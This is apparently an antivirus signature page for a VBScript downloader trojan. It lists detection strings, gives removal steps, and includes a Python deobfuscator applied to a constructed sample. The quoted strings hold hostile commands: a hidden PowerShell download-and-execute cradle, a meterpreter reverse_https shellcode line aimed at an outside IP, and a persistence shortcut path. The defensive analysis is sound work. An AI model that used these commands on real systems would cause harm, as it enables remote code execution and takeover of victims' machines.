Concrete signature match: Trojan (appears legitimate but performs malicious actions), platform VBScript, family Valyria
This is a VBScript trojan that acts as a downloader. It launches PowerShell through a heavily obfuscated command line (string concatenation, `[char]` casts, chained `.Replace()` calls that substitute placeholder tokens for quotes, `|` and `$`, and an `iex` alias derived from `$VerbosePreference`), which then downloads and executes a second-stage payload from the internet, and it attempts to create a shortcut (.lnk) file under the user's roaming AppData folder for persistence.
Relevant strings associated with this threat:
- = "powershell.exe . ( ([sTrINg]$VeRBOSePRefeREnCe)[1,3]+'x'-JOIn'') (MACROHSTR_EXT)
- Phtt'+'ps://fi'+'le'+' (MACROHSTR_EXT)
- @box'+'.'+'m (MACROHSTR_EXT)
- @n'+'l.p'+'n'+'g'+' (MACROHSTR_EXT)
- .ReplAc'+'E'+'(([cHa'+'r]55+[cHar'+']'+'83+[c'+'H'+'a'+'r]90),['+'sTR'+'in'+'g][cHar'+']'+'3'+'4'+') (MACROHSTR_EXT)
- P)').REPLaCE(' (MACROHSTR_EXT)
- ',[sTRInG][Char]124).REPLaCE(' (MACROHSTR_EXT)
- ',[sTRInG][Char]36).REPLaCE(([Char]105+[Char]75+[Char]78),[sTRInG][Char]39) ) " (MACROHSTR_EXT)
- Lib "shell32" Alias "ShellExecuteA" (MACROHSTR_EXT)
- transfvw585zbhr.sh/gvw585zbht/spmvw585zbhl6 (MACROHSTR_EXT)
- bfss21appdbfss21atbfss21a\robfss21aming\beros.lnk (MACROHSTR_EXT)
- mnotepad.exe (MACROHSTR_EXT)
- ("setobjshell=wscript.createobject(""wscript.shell"")") (MACROHSTR_EXT)
- ("command=""c:\windows\system32\windowspowershell\v1.0\powershell.exe-windowstylehidden-nop-noexit-ciex((new-objectnet.webclient) (MACROHSTR_EXT)
- downloadstring('https://raw.githubusercontent.com/enigma0x3/generate-macro/master/generate-macro.ps1')) (MACROHSTR_EXT)
- invoke-shellcode-payloadwindows/meterpreter/reverse_https-lhost172.19.240.124-lport1234-force""") (MACROHSTR_EXT)
- writeline("objshell.runcommand,0") (MACROHSTR_EXT)
- wscriptc:\users\public\config.vbs (MACROHSTR_EXT)
- Set jbxinstr = CreateObject("Scripting.FileSystemObject").CreateTextFile("Z:\syscalls\0_" & Int(Rnd * 10000 + 10000) & ".vba.csv", True, True) (MACROHSTR_EXT)
- Set jbxXmlNodeOb = jbxXmlOb.createElement("b64") (MACROHSTR_EXT)
- jbxXmlNodeOb.dataType = "bin.base64" (MACROHSTR_EXT)
- JbxB64Encode = Replace(jbxXmlNodeOb.Text, vbLf, "") (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Hash: e64a746af330452d57d915d938f3572ee034b29d8058758c8ea7876724cbac6c
Use your security software to remove the detected file and run a full system scan. Manually inspect `%APPDATA%` (which already expands to `C:\Users\<user>\AppData\Roaming`) and its Startup folder, `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`, for suspicious shortcut (.lnk) files and remove them; the persistence path in the strings above reads `appdata\roaming\beros.lnk` once the `bfss21` filler token is stripped, i.e. `%APPDATA%\beros.lnk`. Since this is a downloader, isolate the endpoint and investigate for secondary infections.
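The PowerShell launch line and the `.Replace()` chain in the strings above can be unwound statically rather than by running the sample. The decoder below is an added example written for this page; it is not code from the signature, the sample, or any referenced tool. It resolves the `([string]$VerbosePreference)[1,3]+'x'-join''` trick (the default value `SilentlyContinue` indexed at 1 and 3 gives `ie`, plus `x`), turns `[char]N` casts into literals, merges `'a'+'b'` concatenations, applies the placeholder `.Replace()` chain in order, and strips a filler token such as `bfss21` from the .lnk path. The `SAMPLE` command line is constructed in the same style as the strings above and the URL in it is a placeholder; it is not the real sample's command.

```python
import re

# Added example, not code from the signature or the sample: a static decoder for the
# PowerShell obfuscation layers visible in the strings above. SAMPLE below is
# constructed in the same style; the host file.example.invalid is a placeholder.

LIT = r"'((?:[^']|'')*)'"          # PowerShell single-quoted literal; '' escapes a quote
CHAR_GROUP = r"(\[char\]\d+(?:\s*\+\s*\[char\]\d+)*)"
CHAR_CAST = re.compile(r"(?:\[string\])?(?:\(" + CHAR_GROUP + r"\)|" + CHAR_GROUP + ")", re.I)
IEX_TRICK = re.compile(
    r"\(\s*\(\s*\[string\]\s*\$VerbosePreference\s*\)\s*\[([\d,\s]+)\]\s*\+\s*'x'\s*-join\s*''\s*\)",
    re.I)
CONCAT = re.compile(LIT + r"\s*\+\s*" + LIT)
PARENS = re.compile(r"(?<![\w\]])\(\s*(" + LIT + r")\s*\)")
REPLACE = re.compile(r"(" + LIT + r")\s*\.replace\(\s*" + LIT + r"\s*,\s*" + LIT + r"\s*\)", re.I)


def ps_quote(text):
    return "'" + text.replace("'", "''") + "'"


def ps_unquote(body):
    return body.replace("''", "'")


def resolve_verbosepreference_trick(cmd, default="SilentlyContinue"):
    # ([string]$VerbosePreference)[1,3]+'x'-join'' indexes the default value
    # "SilentlyContinue" -> 'i','e' and appends 'x': the Invoke-Expression alias.
    def repl(m):
        idx = [int(i) for i in m.group(1).split(",")]
        return "".join(default[i] for i in idx) + "x"
    return IEX_TRICK.sub(repl, cmd)


def resolve_char_casts(cmd):
    # ([char]55+[char]83+[char]90) -> '7SZ'; [string][char]124 -> '|'
    def repl(m):
        codes = re.findall(r"\d+", m.group(1) or m.group(2))
        return ps_quote("".join(chr(int(c)) for c in codes))
    return CHAR_CAST.sub(repl, cmd)


def fold_strings(cmd):
    # Repeat to a fixed point: merge 'a'+'b', drop ('lit') parens, and apply
    # 'lit'.Replace('x','y') left to right. .NET String.Replace is case-sensitive,
    # so str.replace matches its semantics.
    prev = None
    while prev != cmd:
        prev = cmd
        cmd = CONCAT.sub(lambda m: ps_quote(ps_unquote(m.group(1)) + ps_unquote(m.group(2))), cmd)
        cmd = PARENS.sub(lambda m: m.group(1), cmd)
        cmd = REPLACE.sub(lambda m: ps_quote(ps_unquote(m.group(2)).replace(
            ps_unquote(m.group(3)), ps_unquote(m.group(4)))), cmd)
    return cmd


def deobfuscate(cmd):
    """Return the resolved command line and the string literals left in it (the payload)."""
    cmd = fold_strings(resolve_char_casts(resolve_verbosepreference_trick(cmd)))
    return cmd, [ps_unquote(b) for b in re.findall(LIT, cmd)]


def strip_filler(s, token):
    # bfss21appdbfss21at... -> appdata\roaming\beros.lnk once the junk token is removed
    return s.replace(token, "")


# Constructed input mirroring the pattern of the strings above (placeholders 7SZ -> ", Q -> |,
# U -> $, iKN -> '); not the real sample's command line.
SAMPLE = (
    "powershell.exe . ( ([sTrINg]$VeRBOSePRefeREnCe)[1,3]+'x'-JOIn'') "
    "( ('Uc=New-Obj'+'ect Net.We'+'bCl'+'ient;Uc.Down'+'loadStr'+'ing(7SZhtt'+'ps://fi'+'le'"
    "+'.example.invalid/n'+'l.p'+'n'+'g7SZ)Qiex;echo iKNdo'+'neiKN')"
    ".ReplAcE(([cHar]55+[cHar]83+[cHar]90),[sTRInG][cHar]34)"
    ".REPLaCE('Q',[sTRInG][Char]124).REPLaCE('U',[sTRInG][Char]36)"
    ".REPLaCE(([Char]105+[Char]75+[Char]78),[sTRInG][Char]39) )"
)

if __name__ == "__main__":
    resolved, literals = deobfuscate(SAMPLE)
    print(resolved)
    for lit in literals:
        print("payload:", lit)
    print(strip_filler(r"bfss21appdbfss21atbfss21a\robfss21aming\beros.lnk", "bfss21"))
```

The order of the `.Replace()` calls matters: the decoder applies them exactly as the sample would, so a placeholder that only becomes valid after an earlier substitution is handled correctly. The regular expressions only cover the constructs seen in this family's strings; a sample using format operators, `-bxor` loops or script-block invocation needs additional rules.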